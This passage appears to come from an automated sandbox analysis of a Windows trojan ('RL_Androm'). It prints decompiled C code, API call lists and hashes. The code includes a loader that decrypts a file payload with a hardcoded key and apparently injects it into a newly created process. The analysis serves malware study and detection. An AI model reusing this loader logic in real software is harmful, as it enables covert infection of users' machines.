                                                          				char _v35;
                                                          				char _v36;
                                                          				char _v37;
                                                          				char _v38;
                                                          				char _v39;
                                                          				char _v40;
                                                          				char _v41;
                                                          				char _v42;
                                                          				char _v43;
                                                          				char _v44;
                                                          				char _v45;
                                                          				char _v46;
                                                          				char _v47;
                                                          				char _v48;
                                                          				char _v49;
                                                          				char _v50;
                                                          				char _v51;
                                                          				char _v52;
                                                          				char _v53;
                                                          				char _v54;
                                                          				char _v55;
                                                          				char _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				intOrPtr _v72;
                                                          				intOrPtr _v76;
                                                          				intOrPtr _v80;
                                                          				long _v84;
                                                          				intOrPtr _v88;
                                                          				intOrPtr _v92;
                                                          				intOrPtr _v96;
                                                          				intOrPtr _v100;
                                                          				intOrPtr _v104;
                                                          				intOrPtr _v108;
                                                          				intOrPtr _v112;
                                                          				signed int _v116;
                                                          				intOrPtr _v120;
                                                          				intOrPtr _v124;
                                                          				char _v140;
                                                          				char _v208;
                                                          				char _v1248;
                                                          				signed int _t124;
                                                          				void* _t126;
                                                          				void* _t130;
                                                          				signed int _t131;
                                                          				void* _t132;
                                                          				int _t134;
                                                          				int _t137;
                                                          				signed int _t147;
                                                          				void* _t149;
                                                          				signed int _t150;
                                                          				void* _t152;
                                                          				signed int _t153;
                                                          				void* _t155;
                                                          				void* _t156;
                                                          				void* _t157;
                                                          				void* _t158;
                                                          				void* _t159;
                                                          
                                                          				_t159 = __eflags;
                                                          				_t157 = __edx;
                                                          				_t156 = __ecx;
                                                          				_v20 = _v20 & 0x00000000;
                                                          				_v84 = _v84 & 0x00000000;
                                                          				_v56 = 0x37;
                                                          				_v55 = 0x33;
                                                          				_v54 = 0x64;
                                                          				_v53 = 0x36;
                                                          				_v52 = 0x31;
                                                          				_v51 = 0x37;
                                                          				_v50 = 0x32;
                                                          				_v49 = 0x38;
                                                          				_v48 = 0x39;
                                                          				_v47 = 0x64;
                                                          				_v46 = 0x38;
                                                          				_v45 = 0x39;
                                                          				_v44 = 0x34;
                                                          				_v43 = 0x35;
                                                          				_v42 = 0x63;
                                                          				_v41 = 0x32;
                                                          				_v40 = 0x39;
                                                          				_v39 = 0x39;
                                                          				_v38 = 0x62;
                                                          				_v37 = 0x31;
                                                          				_v36 = 0x64;
                                                          				_v35 = 0x62;
                                                          				_v34 = 0x35;
                                                          				_v33 = 0x33;
                                                          				_v32 = 0x65;
                                                          				_v31 = 0x36;
                                                          				_v30 = 0x66;
                                                          				_v29 = 0x33;
                                                          				_v28 = 0x35;
                                                          				_v27 = 0x64;
                                                          				_v26 = 0x30;
                                                          				_v25 = 0x35;
                                                          				_v24 = 0;
                                                          				_v16 = _v16 & 0x00000000;
                                                          				_v116 = _v116 & 0x00000000;
                                                          				_v12 = _v12 & 0x00000000;
                                                          				_v8 = E7378458C();
                                                          				_v60 = E73784634(_v8, 0x34cf0bf);
                                                          				_v64 = E73784634(_v8, 0x55e38b1f);
                                                          				_v68 = E73784634(_v8, 0xd1775dc4);
                                                          				_v120 = E73784634(_v8, 0xd6eb2188);
                                                          				_v96 = E73784634(_v8, 0xa2eae210);
                                                          				_v124 = E73784634(_v8, 0xcd8538b2);
                                                          				_v72 = E73784634(_v8, 0x8a111d91);
                                                          				_v76 = E73784634(_v8, 0x170c1ca1);
                                                          				_v80 = E73784634(_v8, 0xa5f15738);
                                                          				_v88 = E73784634(_v8, 0x433a3842);
                                                          				_v92 = E73784634(_v8, 0x2ffe2c64);
                                                          				_v112 = 0x2d734193;
                                                          				_v108 = 0x63daa681;
                                                          				_v104 = 0x26090612;
                                                          				_v100 = 0x6f28fae0;
                                                          				_t124 = 4;
                                                          				_t126 = E73784225(_t159,  *((intOrPtr*)(_t158 + _t124 * 0 - 0x6c))); // executed
                                                          				_t160 = _t126;
                                                          				if(_t126 != 0) {
                                                          					L4:
                                                          					_v60(0x7918);
                                                          					L5:
                                                          					_v68(0,  &_v1248, 0x103);
                                                          					_t130 = CreateFileW(_a4, 0x80000000, 7, 0, 3, 0x80, 0);
                                                          					_v20 = _t130;
                                                          					if(_v20 != 0xffffffff) {
                                                          						_t131 = _v76(_v20, 0);
                                                          						_v16 = _t131;
                                                          						__eflags = _v16 - 0xffffffff;
                                                          						if(_v16 != 0xffffffff) {
                                                          							_t132 = VirtualAlloc(0, _v16, 0x3000, 4);
                                                          							_v12 = _t132;
                                                          							__eflags = _v12;
                                                          							if(_v12 != 0) {
                                                          								_t134 = ReadFile(_v20, _v12, _v16,  &_v84, 0);
                                                          								__eflags = _t134;
                                                          								if(_t134 != 0) {
                                                          									_t99 =  &_v56; // 0x37
                                                          									E73784029(_v12, _t99, 0x20);
                                                          									_t137 = E73783034(_t156, _t157, __eflags, _v12); // executed
                                                          									__eflags = _t137;
                                                          									if(_t137 != 0) {
                                                          										_v60(0xbb8);
                                                          										E73783005(_t156,  &_v140, 0x10);
                                                          										E73783005(_t156,  &_v208, 0x44);
                                                          										_t137 = _v96( &_v1248, _v92(0, 0, 0, 0x20, 0, 0,  &_v208,  &_v140));
                                                          										__eflags = _t137;
                                                          										if(_t137 != 0) {
                                                          											_t137 = _v64(0);
                                                          										}
                                                          									}
                                                          									ExitProcess(0);
                                                          								}
                                                          								return _t134;
                                                          							}
                                                          							return _t132;
                                                          						}
                                                          						return _t131;
                                                          					}
                                                          					return _t130;
                                                          				}
                                                          				_t147 = 4;
                                                          				_t149 = E73784225(_t160,  *((intOrPtr*)(_t158 + (_t147 << 0) - 0x6c))); // executed
                                                          				_t161 = _t149;
                                                          				if(_t149 != 0) {
                                                          					goto L4;
                                                          				}
                                                          				_t150 = 4;
                                                          				_t152 = E73784225(_t161,  *((intOrPtr*)(_t158 + (_t150 << 1) - 0x6c))); // executed
                                                          				_t162 = _t152;
                                                          				if(_t152 != 0) {
                                                          					goto L4;
                                                          				}
                                                          				_t153 = 4;
                                                          				_t155 = E73784225(_t162,  *((intOrPtr*)(_t158 + _t153 * 3 - 0x6c))); // executed
                                                          				if(_t155 == 0) {
                                                          					goto L5;
                                                          				}
                                                          				goto L4;
                                                          			}













































































                                                          0x737842c8
                                                          0x737842c8
                                                          0x737842c8
                                                          0x737842d1
                                                          0x737842d5
                                                          0x737842d9
                                                          0x737842dd
                                                          0x737842e1
                                                          0x737842e5
                                                          0x737842e9
                                                          0x737842ed
                                                          0x737842f1
                                                          0x737842f5
                                                          0x737842f9
                                                          0x737842fd
                                                          0x73784301
                                                          0x73784305
                                                          0x73784309
                                                          0x7378430d
                                                          0x73784311
                                                          0x73784315
                                                          0x73784319
                                                          0x7378431d
                                                          0x73784321
                                                          0x73784325
                                                          0x73784329
                                                          0x7378432d
                                                          0x73784331
                                                          0x73784335
                                                          0x73784339
                                                          0x7378433d
                                                          0x73784341
                                                          0x73784345
                                                          0x73784349
                                                          0x7378434d
                                                          0x73784351
                                                          0x73784355
                                                          0x73784359
                                                          0x7378435d
                                                          0x73784361
                                                          0x73784365
                                                          0x7378436e
                                                          0x7378437e
                                                          0x7378438e
                                                          0x7378439e
                                                          0x737843ae
                                                          0x737843be
                                                          0x737843ce
                                                          0x737843de
                                                          0x737843ee
                                                          0x737843fe
                                                          0x7378440e
                                                          0x7378441e
                                                          0x73784421
                                                          0x73784428
                                                          0x7378442f
                                                          0x73784436
                                                          0x7378443f
                                                          0x73784447
                                                          0x7378444c
                                                          0x7378444e
                                                          0x73784488
                                                          0x7378448d
                                                          0x73784490
                                                          0x7378449e
                                                          0x737844b6
                                                          0x737844b9
                                                          0x737844c0
                                                          0x737844cc
                                                          0x737844cf
                                                          0x737844d2
                                                          0x737844d6
                                                          0x737844e9
                                                          0x737844ec
                                                          0x737844ef
                                                          0x737844f3
                                                          0x73784509
                                                          0x7378450c
                                                          0x7378450e
                                                          0x73784514
                                                          0x7378451b
                                                          0x73784523
                                                          0x73784528
                                                          0x7378452a
                                                          0x73784531
                                                          0x7378453d
                                                          0x7378454b
                                                          0x73784575
                                                          0x73784578
                                                          0x7378457a
                                                          0x7378457e
                                                          0x7378457e
                                                          0x7378457a
                                                          0x73784583
                                                          0x73784583
                                                          0x00000000
                                                          0x7378450e
                                                          0x00000000
                                                          0x737844f3
                                                          0x00000000
                                                          0x737844d6
                                                          0x00000000
                                                          0x737844c0
                                                          0x73784452
                                                          0x7378445a
                                                          0x7378445f
                                                          0x73784461
                                                          0x00000000
                                                          0x00000000
                                                          0x73784465
                                                          0x7378446c
                                                          0x73784471
                                                          0x73784473
                                                          0x00000000
                                                          0x00000000
                                                          0x73784477
                                                          0x7378447f
                                                          0x73784486
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 73784225: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 7378426A
                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 737844B6
                                                            • Part of subcall function 73784225: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 7378428E
                                                          • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 737844E9
                                                            • Part of subcall function 73784225: Process32NextW.KERNEL32(000000FF,0000022C), ref: 737842B9
                                                          • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 73784509
                                                          • ExitProcess.KERNEL32(00000000), ref: 73784583
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.211111185.0000000073783000.00000040.00020000.sdmp, Offset: 73780000, based on PE: true
                                                          • Associated: 00000001.00000002.211060795.0000000073780000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211078275.0000000073781000.00000080.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211091894.0000000073782000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211127067.0000000073785000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CreateFileProcess32$AllocExitFirstNextProcessReadSnapshotToolhelp32Virtual
                                                          • String ID: 73d617289d8945c299b1db53e6f35d05
                                                          • API String ID: 1567874941-3630458439
                                                          • Opcode ID: 1ce232aee319d8676acfab2c485de6f04bfdb48fbf44c22f5e161f8e2b8913af
                                                          • Instruction ID: fab2a408195227ef1c632aeda96bd80d5b69e50f8ca77db959dcd89b6c15e404
                                                          • Opcode Fuzzy Hash: 1ce232aee319d8676acfab2c485de6f04bfdb48fbf44c22f5e161f8e2b8913af
                                                          • Instruction Fuzzy Hash: 89913570D04398EEEF128BE4CD0ABDDBFB9AF14305F14409AE640BA1D1DBB60A45DB25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                          				char _t11;
                                                          				signed int _t12;
                                                          				int _t15;
                                                          				signed int _t17;
                                                          				void* _t20;
                                                          				CHAR* _t21;
                                                          
                                                          				_t21 = _a4;
                                                          				_t20 = 0x64;
                                                          				while(1) {
                                                          					_t11 =  *0x40a3ec; // 0x61736e
                                                          					_t20 = _t20 - 1;
                                                          					_a4 = _t11;
                                                          					_t12 = GetTickCount();
                                                          					_t17 = 0x1a;
                                                          					_a6 = _a6 + _t12 % _t17;
                                                          					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                          					if(_t15 != 0) {
                                                          						break;
                                                          					}
                                                          					if(_t20 != 0) {
                                                          						continue;
                                                          					}
                                                          					 *_t21 =  *_t21 & 0x00000000;
                                                          					return _t15;
                                                          				}
                                                          				return _t21;
                                                          			}









                                                          0x00405e19
                                                          0x00405e1f
                                                          0x00405e20
                                                          0x00405e20
                                                          0x00405e25
                                                          0x00405e26
                                                          0x00405e29
                                                          0x00405e33
                                                          0x00405e40
                                                          0x00405e43
                                                          0x00405e4b
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e4f
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e51
                                                          0x00000000
                                                          0x00405e51
                                                          0x00000000

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405E29
                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E43
                                                          Strings
                                                          • "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" , xrefs: 00405E15
                                                          • nsa, xrefs: 00405E20
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E18
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-1165982681
                                                          • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                          • Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
                                                          • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                          • Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E740D16DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                          				void _v36;
                                                          				char _v88;
                                                          				struct HINSTANCE__* _t37;
                                                          				intOrPtr _t42;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				void* _t54;
                                                          				intOrPtr _t57;
                                                          				signed int _t61;
                                                          				signed int _t63;
                                                          				void* _t67;
                                                          				void* _t68;
                                                          				void* _t72;
                                                          				void* _t76;
                                                          
                                                          				_t76 = __esi;
                                                          				_t68 = __edi;
                                                          				_t67 = __edx;
                                                          				 *0x740d405c = _a8;
                                                          				 *0x740d4060 = _a16;
                                                          				 *0x740d4064 = _a12;
                                                          				 *((intOrPtr*)(_a20 + 0xc))( *0x740d4038, E740D1556);
                                                          				_push(1); // executed
                                                          				_t37 = E740D1A98(); // executed
                                                          				_t54 = _t37;
                                                          				if(_t54 == 0) {
                                                          					L28:
                                                          					return _t37;
                                                          				} else {
                                                          					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                          						E740D22AF(_t54);
                                                          					}
                                                          					E740D22F1(_t67, _t54);
                                                          					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                          					if(_t57 == 0xffffffff) {
                                                          						L14:
                                                          						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
                                                          							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                          								_t37 = E740D24D8(_t54);
                                                          							} else {
                                                          								_push(_t76);
                                                          								_push(_t68);
                                                          								_t61 = 8;
                                                          								_t13 = _t54 + 0x818; // 0x818
                                                          								memcpy( &_v36, _t13, _t61 << 2);
                                                          								_t42 = E740D156B(_t54,  &_v88);
                                                          								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
                                                          								_t18 = _t54 + 0x818; // 0x818
                                                          								_t72 = _t18;
                                                          								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
                                                          								 *_t72 = 3;
                                                          								E740D24D8(_t54);
                                                          								_t63 = 8;
                                                          								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                          							}
                                                          						} else {
                                                          							E740D24D8(_t54);
                                                          							_t37 = GlobalFree(E740D1266(E740D1559(_t54)));
                                                          						}
                                                          						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                          							_t37 = E740D249E(_t54);
                                                          							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                          								_t37 =  *(_t54 + 0x808);
                                                          								if(_t37 != 0) {
                                                          									_t37 = FreeLibrary(_t37);
                                                          								}
                                                          							}
                                                          							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
                                                          								_t37 = E740D14E2( *0x740d4058);
                                                          							}
                                                          						}
                                                          						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
                                                          							goto L28;
                                                          						} else {
                                                          							return GlobalFree(_t54);
                                                          						}
                                                          					}
                                                          					_t48 =  *_t54;
                                                          					if(_t48 == 0) {
                                                          						if(_t57 != 1) {
                                                          							goto L14;
                                                          						}
                                                          						E740D2CC3(_t54);
                                                          						L12:
                                                          						_t54 = _t48;
                                                          						L13:
                                                          						goto L14;
                                                          					}
                                                          					_t49 = _t48 - 1;
                                                          					if(_t49 == 0) {
                                                          						L8:
                                                          						_t48 = E740D2A38(_t57, _t54); // executed
                                                          						goto L12;
                                                          					}
                                                          					_t50 = _t49 - 1;
                                                          					if(_t50 == 0) {
                                                          						E740D26B2(_t54);
                                                          						goto L13;
                                                          					}
                                                          					if(_t50 != 1) {
                                                          						goto L14;
                                                          					}
                                                          					goto L8;
                                                          				}
                                                          			}


















                                                          0x740d16db
                                                          0x740d16db
                                                          0x740d16db
                                                          0x740d16e5
                                                          0x740d16ed
                                                          0x740d16fa
                                                          0x740d1708
                                                          0x740d170b
                                                          0x740d170d
                                                          0x740d1712
                                                          0x740d1717
                                                          0x740d1836
                                                          0x740d1836
                                                          0x740d171d
                                                          0x740d1721
                                                          0x740d1724
                                                          0x740d1729
                                                          0x740d172b
                                                          0x740d1731
                                                          0x740d1737
                                                          0x740d1767
                                                          0x740d176e
                                                          0x740d1792
                                                          0x740d17dd
                                                          0x740d1794
                                                          0x740d1794
                                                          0x740d1795
                                                          0x740d179b
                                                          0x740d179c
                                                          0x740d17a6
                                                          0x740d17a9
                                                          0x740d17ae
                                                          0x740d17b5
                                                          0x740d17b5
                                                          0x740d17bc
                                                          0x740d17c2
                                                          0x740d17c8
                                                          0x740d17d5
                                                          0x740d17d6
                                                          0x740d17d9
                                                          0x740d1770
                                                          0x740d1771
                                                          0x740d1786
                                                          0x740d1786
                                                          0x740d17e7
                                                          0x740d17ea
                                                          0x740d17f7
                                                          0x740d17fe
                                                          0x740d1806
                                                          0x740d1809
                                                          0x740d1809
                                                          0x740d1806
                                                          0x740d1816
                                                          0x740d181e
                                                          0x740d1823
                                                          0x740d1816
                                                          0x740d182b
                                                          0x00000000
                                                          0x740d182d
                                                          0x00000000
                                                          0x740d182e
                                                          0x740d182b
                                                          0x740d173b
                                                          0x740d173e
                                                          0x740d175c
                                                          0x00000000
                                                          0x00000000
                                                          0x740d175f
                                                          0x740d1764
                                                          0x740d1764
                                                          0x740d1766
                                                          0x00000000
                                                          0x740d1766
                                                          0x740d1740
                                                          0x740d1741
                                                          0x740d1749
                                                          0x740d174a
                                                          0x00000000
                                                          0x740d174a
                                                          0x740d1743
                                                          0x740d1744
                                                          0x740d1752
                                                          0x00000000
                                                          0x740d1752
                                                          0x740d1747
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1747

                                                          APIs
                                                            • Part of subcall function 740D1A98: GlobalFree.KERNEL32 ref: 740D1D09
                                                            • Part of subcall function 740D1A98: GlobalFree.KERNEL32 ref: 740D1D0E
                                                            • Part of subcall function 740D1A98: GlobalFree.KERNEL32 ref: 740D1D13
                                                          • GlobalFree.KERNEL32 ref: 740D1786
                                                          • FreeLibrary.KERNEL32(?), ref: 740D1809
                                                          • GlobalFree.KERNEL32 ref: 740D182E
                                                            • Part of subcall function 740D22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 740D22E0
                                                            • Part of subcall function 740D26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,740D1757,00000000), ref: 740D2782
                                                            • Part of subcall function 740D156B: wsprintfA.USER32 ref: 740D1599
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.211149237.00000000740D1000.00000020.00020000.sdmp, Offset: 740D0000, based on PE: true
                                                          • Associated: 00000001.00000002.211137968.00000000740D0000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211158192.00000000740D3000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211175377.00000000740D5000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                          • String ID:
                                                          • API String ID: 3962662361-3916222277
                                                          • Opcode ID: d2b3ba75a7d478a80cee7070a314ec94ba76991573f3a0a4b55b657371f6dc60
                                                          • Instruction ID: 8e9d54fdd04749100e4224d7be49949df4f2ed6ac71c0e6890d1fe4e73f1797e
                                                          • Opcode Fuzzy Hash: d2b3ba75a7d478a80cee7070a314ec94ba76991573f3a0a4b55b657371f6dc60
                                                          • Instruction Fuzzy Hash: 55417B722003049BEB01AF759984B9A3BFEFB45A18F148479ED069E096DF74824DCFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E004032BF(intOrPtr _a4) {
                                                          				intOrPtr _t11;
                                                          				signed int _t12;
                                                          				void* _t15;
                                                          				long _t16;
                                                          				void* _t18;
                                                          				intOrPtr _t30;
                                                          				intOrPtr _t33;
                                                          				intOrPtr _t35;
                                                          				void* _t36;
                                                          				intOrPtr _t48;
                                                          
                                                          				_t33 =  *0x429464 -  *0x40b898 + _a4;
                                                          				 *0x42f450 = GetTickCount() + 0x1f4;
                                                          				if(_t33 <= 0) {
                                                          					L22:
                                                          					E00402E52(1);
                                                          					return 0;
                                                          				}
                                                          				E0040343E( *0x429474);
                                                          				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
                                                          				 *0x429470 = _t33;
                                                          				 *0x429460 = 0;
                                                          				while(1) {
                                                          					_t30 = 0x4000;
                                                          					_t11 =  *0x429468 -  *0x429474;
                                                          					if(_t11 <= 0x4000) {
                                                          						_t30 = _t11;
                                                          					}
                                                          					_t12 = E00403428(0x41d460, _t30);
                                                          					if(_t12 == 0) {
                                                          						break;
                                                          					}
                                                          					 *0x429474 =  *0x429474 + _t30;
                                                          					 *0x40b8a0 = 0x41d460;
                                                          					 *0x40b8a4 = _t30;
                                                          					L6:
                                                          					L6:
                                                          					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
                                                          						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
                                                          						E00402E52(0);
                                                          					}
                                                          					 *0x40b8a8 = 0x415460;
                                                          					 *0x40b8ac = 0x8000;
                                                          					if(E0040677B(0x40b8a0) < 0) {
                                                          						goto L20;
                                                          					}
                                                          					_t35 =  *0x40b8a8; // 0x415f10
                                                          					_t36 = _t35 - 0x415460;
                                                          					if(_t36 == 0) {
                                                          						__eflags =  *0x40b8a4; // 0x0
                                                          						if(__eflags != 0) {
                                                          							goto L20;
                                                          						}
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L20;
                                                          						}
                                                          						L16:
                                                          						_t16 =  *0x429464;
                                                          						if(_t16 -  *0x40b898 + _a4 > 0) {
                                                          							continue;
                                                          						}
                                                          						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                          						goto L22;
                                                          					}
                                                          					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
                                                          					if(_t18 == 0) {
                                                          						_push(0xfffffffe);
                                                          						L21:
                                                          						_pop(_t15);
                                                          						return _t15;
                                                          					}
                                                          					 *0x40b898 =  *0x40b898 + _t36;
                                                          					_t48 =  *0x40b8a4; // 0x0
                                                          					if(_t48 != 0) {
                                                          						goto L6;
                                                          					}
                                                          					goto L16;
                                                          					L20:
                                                          					_push(0xfffffffd);
                                                          					goto L21;
                                                          				}
                                                          				return _t12 | 0xffffffff;
                                                          			}













                                                          0x004032cf
                                                          0x004032e2
                                                          0x004032e7
                                                          0x00403417
                                                          0x00403419
                                                          0x00000000
                                                          0x0040341f
                                                          0x004032f3
                                                          0x00403306
                                                          0x0040330c
                                                          0x00403312
                                                          0x0040331d
                                                          0x00403322
                                                          0x00403327
                                                          0x0040332f
                                                          0x00403331
                                                          0x00403331
                                                          0x0040333a
                                                          0x00403341
                                                          0x00000000
                                                          0x00000000
                                                          0x00403347
                                                          0x0040334d
                                                          0x00403353
                                                          0x00000000
                                                          0x00403359
                                                          0x0040335f
                                                          0x0040337f
                                                          0x00403384
                                                          0x00403389
                                                          0x0040338f
                                                          0x00403395
                                                          0x004033a6
                                                          0x00000000
                                                          0x00000000
                                                          0x004033a8
                                                          0x004033ae
                                                          0x004033b0
                                                          0x004033d3
                                                          0x004033d9
                                                          0x00000000
                                                          0x00000000
                                                          0x004033db
                                                          0x004033dd
                                                          0x00000000
                                                          0x00000000
                                                          0x004033df
                                                          0x004033df
                                                          0x004033f2
                                                          0x00000000
                                                          0x00000000
                                                          0x00403401
                                                          0x00000000
                                                          0x00403401
                                                          0x004033ba
                                                          0x004033c1
                                                          0x0040340e
                                                          0x00403414
                                                          0x00403414
                                                          0x00000000
                                                          0x00403414
                                                          0x004033c3
                                                          0x004033c9
                                                          0x004033cf
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403412
                                                          0x00403412
                                                          0x00000000
                                                          0x00403412
                                                          0x00000000

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004032D3
                                                            • Part of subcall function 0040343E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,0040B8A0,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: FilePointer$CountTick
                                                          • String ID: `TA
                                                          • API String ID: 1092082344-1754987364
                                                          • Opcode ID: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                          • Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
                                                          • Opcode Fuzzy Hash: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                          • Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 7378337D
                                                          • GetThreadContext.KERNELBASE(?,00010007), ref: 737833A0
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 737833C4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.211111185.0000000073783000.00000040.00020000.sdmp, Offset: 73780000, based on PE: true
                                                          • Associated: 00000001.00000002.211060795.0000000073780000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211078275.0000000073781000.00000080.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211091894.0000000073782000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211127067.0000000073785000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThread
                                                          • String ID:
                                                          • API String ID: 2411489757-0
                                                          • Opcode ID: 336b3eaefdafa4c325ec6c7ec43c8978254d40ff6472ec0be642d855be60ce94
                                                          • Instruction ID: 28bdea1e58247ca41318650baf6bab78dac731617295514e604dc4256f6b84f7
                                                          • Opcode Fuzzy Hash: 336b3eaefdafa4c325ec6c7ec43c8978254d40ff6472ec0be642d855be60ce94
                                                          • Instruction Fuzzy Hash: D7323675E40218AFEB51CFA8DC45BEDBBB5AF08700F20409AE509FB2A0D7719A81DF15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 60%
                                                          			E0040209D(void* __ebx, void* __eflags) {
                                                          				struct HINSTANCE__* _t18;
                                                          				struct HINSTANCE__* _t26;
                                                          				void* _t27;
                                                          				struct HINSTANCE__* _t30;
                                                          				CHAR* _t32;
                                                          				intOrPtr* _t33;
                                                          				void* _t34;
                                                          
                                                          				_t27 = __ebx;
                                                          				asm("sbb eax, 0x42f518");
